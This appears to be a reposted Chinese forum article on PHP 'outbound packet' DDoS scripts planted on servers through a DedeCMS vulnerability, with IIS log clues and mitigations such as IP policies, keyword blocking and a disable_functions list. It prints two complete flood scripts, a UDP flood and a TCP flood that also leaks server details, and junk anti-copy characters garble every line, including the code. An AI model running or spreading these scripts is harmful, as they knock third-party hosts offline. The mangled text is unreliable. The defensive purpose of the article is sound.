服务器php对外发包引起崩溃的解决办法paopao最近老听人说,php对外发包,引起服务器崩溃或被机房查封,今天闲着无事和大家一起分享paopao我总结的DEDECMS php对外发包引发服务器崩溃的终极解决方法,希望可以帮助大家解决服务器问题,让网站运行的更好
' a8 G% {8 ^' X1 O* G0 F- [ 一。php对外发包分析7 o9 _3 M$ G- m |$ i
用php代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
' K: C# u% t7 L2 f# ^1 Z 以下是代码片段:/ P0 k; ^' H% t2 Q/ y: N$ G( |) v
$packets = 0;/ j+ Z' c. H+ I4 _
$ip = $_GET[\'ip\'];8 o$ b2 P- n' h- ~
$rand = $_GET[\'port\'];
9 p3 w7 j/ r4 N+ A, t set_time_limit(0);6 c8 N* Y2 T* ^
ignore_user_abort(FALSE);
6 f/ b0 T! f) o) T $exec_time = $_GET[\'time\'];sbxl-201206125 m& u6 i* [$ Z$ U- s/ I
$time = time();' M; u2 R' ^8 X5 M2 {
print \'Flooded: $ip on port $rand
# S u8 E, e- m/ R3 z" t2 M _ \';2 n0 u3 i9 c- ?4 O0 C
$max_time = $time+$exec_time;5 x! R( L: Q. Z: x2 W
for($i=0;$i<65535;$i++){
& R" V8 Y2 P. ?* V) R+ e0 L $out .= \'X\';
4 L) v+ w2 Q5 m' q+ h$ C2 c# ]2 n }/ p: I4 _5 A( @6 A4 q: Z( c( I8 l- c/ Z
while(1){
3 G# n3 r x( ~) r3 Q' @ $packets++;, e% X7 j P& }0 o. ~ i
if(time() > $max_time){
6 n9 T z% ~" l6 I break;
# F7 m. W+ ]# G# l }
! P/ P! g; e2 u% l( U% b G $fp = fsockopen(\'udp://$ip\', $rand, $errno, $errstr, 5);5 ~' O' u! u+ P
if($fp){
4 S% H" E9 Q/ ` fwrite($fp, $out);
/ B" ^' ?$ |6 ^7 |, f4 T fclose($fp);9 U6 k2 d; L) j0 @. c/ U- R# l; x
}& _3 P% k0 e( k4 ?" k: Q% _
}& x' f: x1 f8 J
echo \'Packet complete at \'.time(\'h:i:s\').\' with" B; F- F/ f, T; k
$packets (\' . round(($packets*65)/1024, 2) . \' mB) packets averaging \'.
- Y8 E) d& m6 v% k9 }: h! r round($packets/$exec_time, 2) . \' packets/s ;+ B+ r4 i& E. K* |2 L
?>* [3 V( Z5 p3 l- X9 Y4 J
二。表现特征
. ]9 i7 S( z$ j- X9 P 一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是服务器不断收到大量数据包./ `4 d0 x: D- k1 v, ~5 \4 D* Q! F( J
近期由于DEDECMS出现漏洞而导致大量服务器出现这个问题.
J- v2 j% v, j& b. { 如何快速找到这些站?
* X$ j$ a# t- s% M 你可以打开日志
( U) I. l! g- ]4 }( v# r C:\Windows\System32\LogFiles\HTTPERR\httperr...log,打开今天时间的文件,4 e4 S. F1 X, r$ \! T. ]) O5 ]
里面有类似这样的记录:
+ ? u+ B# {+ }5 } 2012-04-26 06:37:28 58.255.112.112 26817 98.126.247.13 80 HTTP/1.1 GET /xxxx/xxxxxx.php?host=122.224.32.100&port=445&time=120 503 783 Disabled 30_FreeHost_1
9 Q$ H/ k. I# o( l3 ^ 最后三项783 Disabled 30_FreeHost_1- \7 P0 d* T% g* T: I; H
783就是这个站在IIS中的ID$ ~2 T8 A4 E7 r, o1 m4 \
30_FreeHost_1就是所在池9 p! ]: V+ j1 o G# ?
三?解决办法
' v) ` n" g% \ 1.按上述找到这个网站后停止它.或停止池,并重启IIS.- n( Q& G) ^9 q* O4 z
2.在IP策略,或防火墙中,禁止所有udp向外发送/ X; c2 d6 ~( O0 O! b. \1 l' s$ u o
在星外最新版本的安全包中,已带有4.0版本的IP策略【下载safe包】,您导入后就直接可以限制了外发的UDP包?下载这个包,之后导入安全策略?但这个策略并没有关闭DNS端口,部分攻击还是有效.0 v7 F1 _! q. a9 ]
为了解决这个问题,你也可以调整IP策略,限制udp只能访问特定的DNS服务器IP,如8.8.8.8,除非黑客攻击这个IP,不然攻击也是无效的,你可以在网卡DNS中设置一个你才知道的DNS IP,并且不要公开,然后调用IP策略中的udp open部分就可以解决.(打开IP策略的属性,双击open,将open中的两条udp记录删除任意一条,在保留的这条中,双击,改成 地址 从源地址 任何地址 到目标地址'特定IP 这个IP就是设置为你自己的DNS IP,如8.8.8.8' 保存后就行了)3 j' Y" Q% W% L8 j$ y
在2011-4-27,我们上传了新的安全包,里面有一个'星外虚拟主机管理平台IP策略关闭所有UDP端口用.ipsec'文件,您可以导入它并启用,就可以关闭所有udp端口,就可以完全防止这类攻击,但是,这个策略由于关闭了DNS端口,会造成的这台服务器上无法用IE访问任何域名,因此,用户的采集功能也就用不了.(同样,如果在主控网站上用了这个策略,就会造成的受控自检不通过,因为解析不了域名,另外,部分用户反映此策略会造成的mysql不正常)
9 A9 g$ f! Y& C r' a 3.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词(其他关键词可以删除.)* P! w0 E' r0 W5 b+ @3 k* I
4.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
$ [4 R d* r( N ignore_user_abort = On
) @9 o% o/ |6 B7 c1 m, K+ q (注意前面的;号要删除)
E' x2 X+ J7 e disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,
7 d4 N2 \8 {; H% r# x 在后面加上. t) X4 Q2 {; |. T4 T2 f+ {
fsockopen,set_time_limit& B* z. `: b u5 q
但这样会造成很多php程序都不正常.
+ B4 P$ E3 x# Z- m9 _ 另外,这也表明你的服务器安全做得不错,如果能入侵.黑客就直接提权了,还DOS做什么?- W8 A; A1 s1 H. R0 P
近期已有新的基于TCP攻击的PHPDDOS代码如下:) I! `% l( c$ k7 m
以下是代码片段:7 J# X. N7 [9 j* z
set_time_limit(999999);
! e t% Z) K3 w/ d8 G& @ $host = $_GET['host'];
, F+ X" ]3 u! T* s6 o $port = $_GET['port'];
4 m5 O- Q7 [) a5 [6 S- r. Z2 M $exec_time = $_GET['time'];' s0 w( _# {4 S8 ?. l9 a8 o
$packets = 64;# F* X( g4 |7 @# c! Z! P2 I: l! a
ignore_user_abort(True);
: O& q7 G+ ~ x0 J if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
/ W7 \& ?/ m- J+ H/ }, `/ Z if (StrLen($_GET['rat'])<>0){) `2 O3 \' b1 c8 m: S7 w
echo $_GET['rat'].$_SERVER['HTTP_HOST'].'|'.GetHostByName($_SERVER['SERVER_NAME']).'|'.# ~: Z, H" C5 d; m, R* e+ m
php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
4 |+ h0 Y8 h& i exit;) d2 N7 Q8 L1 q+ M
}
1 ^" s- F: E7 ]0 \( d exit;( ?1 [" F$ p2 b5 h1 J
}; Y8 a% {5 e0 | w3 m4 a- C$ _
$max_time = time()+$exec_time;
* Q2 r9 E6 G; ?2 { while(1){
# k3 K* O7 ? w# r $packets++;* N9 j% ?! |# K
if(time() > $max_time or $exec_time != 69){
7 x* S5 b) g6 L1 V7 g break;
* e0 T" N; [2 }; _' U }
V; p- \8 g* q! |/ e6 F $fp = fsockopen('tcp://$host', $port, $errno, $errstr, 0);; \! ^/ F9 ^( S, N9 z* z5 W0 v) {: ?
}, c; M! {( Y0 e
?>, N- |. |, E4 _
同样,可以采有以下解决办法:
* a3 [% \+ `0 z' y8 c D3 K7 ]( t1 Z 1.也可以直接禁止上面的代码,如改win\php.ini后重启IIS
- j6 T3 {$ w7 D4 s$ o1 P ignore_user_abort = On; `$ [' R$ a$ P
(注意前面的;号要删除)* {6 S( Y8 i; s6 l- H
disable_functions =exec,system,passthru,popen,pclose,shell_exec,proc_open,curl_exec,multi_exec,dl,chmod,stream_socket_server,popepassthru,pfsockopen,gzinflate,2 o6 n& H$ e, s
在后面加上
' v" J9 b; D1 N# f" ` fsockopen,set_time_limit
' R u; b1 ~' Y) Z6 M b$ J 但这样会造成很多php程序都不正常. 如果您是IDC,给客户提供空间的,禁用函数可能导致客户程序无法运行,所以一般不要用此办法. K, _, {) ^8 V( `$ T, @
2.在IP策略中禁止所有外访的TCP数据包,但这样会造成的采集功能无效,也不能用在主控服务器上?! N: ?! o! q0 t- l$ _0 M
3.在服务器要用关键词tcp:或udp:搜索所有php类文件,找到攻击文件,删除它?, X3 t3 I' E+ R
文章出自医院网站优化 http://www.ahyyqing.com,转载请注明出处。, B2 D1 N& a% J7 T* R) F
|
